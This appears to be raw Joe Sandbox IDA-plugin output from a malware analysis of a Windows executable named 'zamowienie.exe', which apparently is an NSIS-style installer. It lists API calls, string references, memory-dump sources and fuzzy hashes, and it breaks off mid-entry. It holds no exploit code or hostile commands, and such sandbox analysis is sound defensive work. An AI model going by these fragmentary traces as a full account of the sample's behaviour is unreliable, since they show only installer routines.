                                                                                                                                              • lstrcatA.KERNEL32(00420130,0040A130,Y/@,00420130,00000000,00000000,00000000), ref: 0040555E
                                                                                                                                              • SetWindowTextA.USER32(00420130,00420130), ref: 00405570
                                                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405596
                                                                                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004055B0
                                                                                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 004055BE
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                              • String ID: Y/@
                                                                                                                                              • API String ID: 2531174081-4176262608
                                                                                                                                              APIs
                                                                                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,?,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",004034CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00406710
                                                                                                                                              • CharNextA.USER32(?,?,?,00000000,?,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",004034CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 0040671D
                                                                                                                                              • CharNextA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",004034CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00406722
                                                                                                                                              • CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",004034CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00406732
                                                                                                                                              Strings
                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004066B9
                                                                                                                                              • *?|<>/":, xrefs: 00406700
                                                                                                                                              • "C:\Users\user\Desktop\zamowienie.exe", xrefs: 004066B8
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                              • String ID: "C:\Users\user\Desktop\zamowienie.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                              • API String ID: 589700163-1210131728
                                                                                                                                              APIs
                                                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402EFA
                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402F18
                                                                                                                                              • wsprintfA.USER32 ref: 00402F46
                                                                                                                                                • Part of subcall function 00405502: lstrlenA.KERNEL32(00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000,?), ref: 0040553B
                                                                                                                                                • Part of subcall function 00405502: lstrlenA.KERNEL32(Y/@,00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000), ref: 0040554B
                                                                                                                                                • Part of subcall function 00405502: lstrcatA.KERNEL32(00420130,0040A130,Y/@,00420130,00000000,00000000,00000000), ref: 0040555E
                                                                                                                                                • Part of subcall function 00405502: SetWindowTextA.USER32(00420130,00420130), ref: 00405570
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405596
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004055B0
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001013,?,00000000), ref: 004055BE
                                                                                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F6A
                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F78
                                                                                                                                                • Part of subcall function 00402EC6: MulDiv.KERNEL32(0004D64F,?,0004E10C), ref: 00402EDB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                              • String ID: ... %d%%$#VhJ.@
                                                                                                                                              • API String ID: 722711167-641327262
                                                                                                                                              • Opcode ID: a9b726a743a4a4a49eee2be659da90be19c786cf3da850da28c34197e21bf41e
                                                                                                                                              • Instruction ID: b5be8217fc920dbbb74492efed7bd9834ce299e20993dd740885a83f9790073e
                                                                                                                                              • Opcode Fuzzy Hash: a9b726a743a4a4a49eee2be659da90be19c786cf3da850da28c34197e21bf41e
                                                                                                                                              • Instruction Fuzzy Hash: A801C470542215EBC721ABA0EF0DEAF3A7CEB40745B10403BF901B21E4C6B89402DBED
                                                                                                                                              APIs
                                                                                                                                              • GetWindowLongA.USER32(?,000000EB), ref: 004044E2
                                                                                                                                              • GetSysColor.USER32(00000000), ref: 00404520
                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040452C
                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404538
                                                                                                                                              • GetSysColor.USER32(?), ref: 0040454B
                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040455B
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404575
                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 0040457F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                              • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                                                                                                                              • Instruction ID: cbb27419647cba54826f3dc27ddae425a6b229e77b97164b9c9b1d5840c2de7b
                                                                                                                                              • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                                                                                                                              • Instruction Fuzzy Hash: DB2137B1500704ABCB219F78DD48A577BF8AF45714B04893DEB96B26E0DB34D948CB54
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 734012A5: GlobalAlloc.KERNEL32(?,734012C3,?,7340135F,-7340504B,734011C0,-000000A0), ref: 734012AD
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 7340266E
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 734026A8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2469733546.0000000073401000.00000020.00000001.01000000.00000005.sdmp, Offset: 73400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_73400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$Free$Alloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1780285237-0
                                                                                                                                              • Opcode ID: d5cb97b8fd6660c784facd66d15408956a2cd9d232225f3fcddacf2aa14e2937
                                                                                                                                              • Instruction ID: d64701f80917b2eb2cc929845e9c9de1ca421c3ae4547809574c9126582303f4
                                                                                                                                              • Opcode Fuzzy Hash: d5cb97b8fd6660c784facd66d15408956a2cd9d232225f3fcddacf2aa14e2937
                                                                                                                                              • Instruction Fuzzy Hash: 0441CF72704219EFE30EAF54CA84E2E77FEEB85208B1449FDF545A72A0C73098058B69
                                                                                                                                              APIs
                                                                                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404DCC
                                                                                                                                              • GetMessagePos.USER32 ref: 00404DD4
                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404DEE
                                                                                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404E00
                                                                                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404E26
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                              • String ID: f
                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                              • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                                                                                                                              • Instruction ID: a9c6250cce98d8b52e3a4ba0b4a93ea31e49052898150c2ecbcdb84c6b66d184
                                                                                                                                              • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                                                                                                                              • Instruction Fuzzy Hash: 36019E71900218BAEB00DB94DD85FFFBBBCAF44711F10012BBB00B61D0C7B499418BA4
                                                                                                                                              APIs
                                                                                                                                              • GetDC.USER32(?), ref: 00401E5D
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                                                                                                                              • CreateFontIndirectA.GDI32(0040B820), ref: 00401EDF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                              • String ID: Tahoma
                                                                                                                                              • API String ID: 3808545654-3580928618
                                                                                                                                              • Opcode ID: 5b1cc09c1bfd387fb6a8acff3338b87f8f9e65aa7c9416f2c7d7f238a5b4f98e
                                                                                                                                              • Instruction ID: b69917716a541bd4796a60a55a2362698fb41d3dea0d830b9302405c98ab91d6
                                                                                                                                              • Opcode Fuzzy Hash: 5b1cc09c1bfd387fb6a8acff3338b87f8f9e65aa7c9416f2c7d7f238a5b4f98e
                                                                                                                                              • Instruction Fuzzy Hash: 01014072904344AFE7007B64AE89A9E3FB8E715701F10987AF141B62F2CB794005CB6D
                                                                                                                                              APIs
                                                                                                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E65
                                                                                                                                              • wsprintfA.USER32 ref: 00402E99
                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402EA9
                                                                                                                                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EBB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                                                              • Opcode ID: 71edbbfcd38a5cf25fa41dd78e6502004d6f2f503a5ec3f242630c3e9865e773
                                                                                                                                              • Instruction ID: 4d17fdd3e7c6cab59feb050d7df4f2e3620e99bdfe0bf7055c3989393c578c71
                                                                                                                                              • Opcode Fuzzy Hash: 71edbbfcd38a5cf25fa41dd78e6502004d6f2f503a5ec3f242630c3e9865e773
                                                                                                                                              • Instruction Fuzzy Hash: 78F0817054020CEBEF209F50CD0AFAE3769EB00349F00803AFA12B51D0DBF889558F99
                                                                                                                                              APIs
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 734024D7
                                                                                                                                                • Part of subcall function 734012B4: lstrcpynA.KERNEL32(00000000,?,7340135F,-7340504B,734011C0,-000000A0), ref: 734012C4
                                                                                                                                              • GlobalAlloc.KERNEL32(?,?), ref: 73402452
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 73402467
                                                                                                                                              • GlobalAlloc.KERNEL32(?,?), ref: 73402478
                                                                                                                                              • CLSIDFromString.OLE32(00000000,00000000), ref: 73402486
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 7340248D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2469733546.0000000073401000.00000020.00000001.01000000.00000005.sdmp, Offset: 73400000, based on PE: true
                                                                                                                                               • Associated: 00000000.00000002.2469658319.0000000073400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2469810438.0000000073404000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2469862791.0000000073406000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_73400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3730416702-0
                                                                                                                                              • Opcode ID: 2194abe0b3e7454f107fbe90f9d057b2b592dd438e13066a7dda732b3648d5b2
                                                                                                                                              • Instruction ID: 8c9554b341a6a1926d39b27472167bf6f9ba366965975e70195ef26fdea3ac23
                                                                                                                                              • Opcode Fuzzy Hash: 2194abe0b3e7454f107fbe90f9d057b2b592dd438e13066a7dda732b3648d5b2
                                                                                                                                              • Instruction Fuzzy Hash: 9C41AFB2708308EFE3199F349940B2A73F8FB40315F1449BEE556EA6C0E7709445CB69
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00405F51: GetFileAttributesA.KERNELBASE(00000003,00402FC4,C:\Users\user\Desktop\zamowienie.exe,80000000,00000003), ref: 00405F55
                                                                                                                                                • Part of subcall function 00405F51: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F77
                                                                                                                                              • GlobalAlloc.KERNEL32(?,?), ref: 0040286E
                                                                                                                                                • Part of subcall function 004034A9: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004031A7,?), ref: 004034B7
                                                                                                                                              • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 0040288A
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004028C9
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                                                                                                                                • Part of subcall function 00403222: SetFilePointer.KERNELBASE(0000000A,00000000,00000000,00000000,00000000,?,?,004031CE,000000FF,00000000,00000000,0000000A,?), ref: 00403247
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?), ref: 004028F8
                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0040290B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                               • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Global$AllocFreePointer$AttributesCloseCreateDeleteHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 488507980-0
                                                                                                                                              • Opcode ID: b1de723b102a86e7d872b7f2cd7c38dc2df8caf973a81d31e2e55e2540d49469
                                                                                                                                              • Instruction ID: c0e9616b4afca8c64668262dc628c1609f1adc6a49346ada0331d72917486a59
                                                                                                                                              • Opcode Fuzzy Hash: b1de723b102a86e7d872b7f2cd7c38dc2df8caf973a81d31e2e55e2540d49469
                                                                                                                                              • Instruction Fuzzy Hash: EC213972C00128BBDF216FA5DD489AEBB79EF04364B14823AF554B62E0CB7949419F68
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(00420950,00420950,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404BC2,000000DF,00000000,00000400,?), ref: 00404D45
                                                                                                                                              • wsprintfA.USER32 ref: 00404D4D
                                                                                                                                              • SetDlgItemTextA.USER32(?,00420950), ref: 00404D60
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                               • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                              • String ID: %u.%u%s%s$PB
                                                                                                                                              • API String ID: 3540041739-1436518253
                                                                                                                                              • Opcode ID: d337dd74189e72dcb0c2b62014cc3533d70f46b2d75e50d72d1433aa9521b4fc
                                                                                                                                              • Instruction ID: 08cb112fabba5a66575a4450cc2f57e80891ffdbd0ec58c8caaf6efbf0c5f7af
                                                                                                                                              • Opcode Fuzzy Hash: d337dd74189e72dcb0c2b62014cc3533d70f46b2d75e50d72d1433aa9521b4fc
                                                                                                                                              • Instruction Fuzzy Hash: 9F11B77360412837EB00656D9C45FAE36999B85374F264237FA26F31D2E978CC5242E8
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2469733546.0000000073401000.00000020.00000001.01000000.00000005.sdmp, Offset: 73400000, based on PE: true
                                                                                                                                               • Associated: 00000000.00000002.2469658319.0000000073400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2469810438.0000000073404000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2469862791.0000000073406000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_73400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeGlobal
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2979337801-0
                                                                                                                                              • Opcode ID: 6823e6c8646c670fd856ddca469763c4ed3f63dfccbb221330c66105f4e225ae
                                                                                                                                              • Instruction ID: d7f868c882db86920950f6f6be91f7fa0351f92abf4e7ad3e685a2a0f9481c1b
                                                                                                                                              • Opcode Fuzzy Hash: 6823e6c8646c670fd856ddca469763c4ed3f63dfccbb221330c66105f4e225ae
                                                                                                                                              • Instruction Fuzzy Hash: A451C37EF04119AFDB0E9BF4894076D7BBAEB45244F1801FAD417B3284F6319A818F59
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401DA3
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00401DF1
                                                                                                                                              • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                                                                                                                              • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401E45
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                               • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                              • Opcode ID: 1100d3a670809fd7746ff0c86559c97455677b3aa147eef4fc382cbcb66dfe22
                                                                                                                                              • Instruction ID: c0ef476fca5f278da91b5b28714a55140b227db46093564fdbdafc316f69a883
                                                                                                                                              • Opcode Fuzzy Hash: 1100d3a670809fd7746ff0c86559c97455677b3aa147eef4fc382cbcb66dfe22
                                                                                                                                              • Instruction Fuzzy Hash: 2F210A72A00509ABDF15DF94DD45AAEBBB6FB44301F10407AF905F62A1CB389941DB58
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034DE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00405D56
                                                                                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034DE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00405D5F
                                                                                                                                              • lstrcatA.KERNEL32(?,0040A014,?,?,0000000A,?), ref: 00405D70
                                                                                                                                              Strings
                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                               • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                               • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                              • API String ID: 2659869361-823278215
                                                                                                                                              • Opcode ID: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                                                                                                                              • Instruction ID: 496e46fcea84712a5b67e9520e3ad6bc5dce3c30524205b23ad6e34059498e2e
                                                                                                                                              • Opcode Fuzzy Hash: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                                                                                                                              • Instruction Fuzzy Hash: 61D0A9A2205A303BE2022725AD09ECF2A488F02315B06406BF640F21A2C7BC5C2287FE
                                                                                                                                              APIs
                                                                                                                                              • CloseHandle.KERNEL32(000002EC,C:\Users\user\AppData\Local\Temp\,004038D8,?,?,?,0000000A,?), ref: 00403AE7
                                                                                                                                              • CloseHandle.KERNEL32(000002F8,C:\Users\user\AppData\Local\Temp\,004038D8,?,?,?,0000000A,?), ref: 00403AFB
                                                                                                                                              Strings
                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403ADA
                                                                                                                                              • C:\Users\user\AppData\Local\Temp\nsz31BB.tmp, xrefs: 00403B0B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandle
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsz31BB.tmp
                                                                                                                                              • API String ID: 2962429428-441691096
                                                                                                                                              • Opcode ID: aeb99d232cf47e8a20d3d5ec1d32ffc6ab59edb41f783ba39e9555f72a53b2ca
                                                                                                                                              • Instruction ID: 94c9627cb3cc1b5e3196ac64c7e2d6575cdca21f285912a133c113318477e523
                                                                                                                                              • Opcode Fuzzy Hash: aeb99d232cf47e8a20d3d5ec1d32ffc6ab59edb41f783ba39e9555f72a53b2ca
                                                                                                                                              • Instruction Fuzzy Hash: E4E086305407189AC120EF7CAD4D9853B285B413357608726F178F20F1C738A99A5EAD
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402FED,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\zamowienie.exe,C:\Users\user\Desktop\zamowienie.exe,80000000,00000003), ref: 00405D9D
                                                                                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402FED,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\zamowienie.exe,C:\Users\user\Desktop\zamowienie.exe,80000000,00000003), ref: 00405DAB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharPrevlstrlen
                                                                                                                                              • String ID: C:\Users\user\Desktop
                                                                                                                                              • API String ID: 2709904686-1246513382
                                                                                                                                              • Opcode ID: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                                                                                                                              • Instruction ID: 80daa9ef4ef6c79f70618e5c43a555a7848ee468dbe5a2310235cfd6ebfc96f6
                                                                                                                                              • Opcode Fuzzy Hash: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                                                                                                                              • Instruction Fuzzy Hash: 66D0A772409D705EF34363209C08BCF6A89CF12300F0940A7E5C0E2191C2BC0C4147ED
                                                                                                                                              APIs
                                                                                                                                              • GlobalAlloc.KERNEL32(?,?), ref: 7340116B
                                                                                                                                              • GlobalAlloc.KERNEL32(?,?), ref: 734011D8
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 73401286
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 7340129B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2469733546.0000000073401000.00000020.00000001.01000000.00000005.sdmp, Offset: 73400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_73400000_zamowienie.jbxd
                                                                                                                                              Similarity
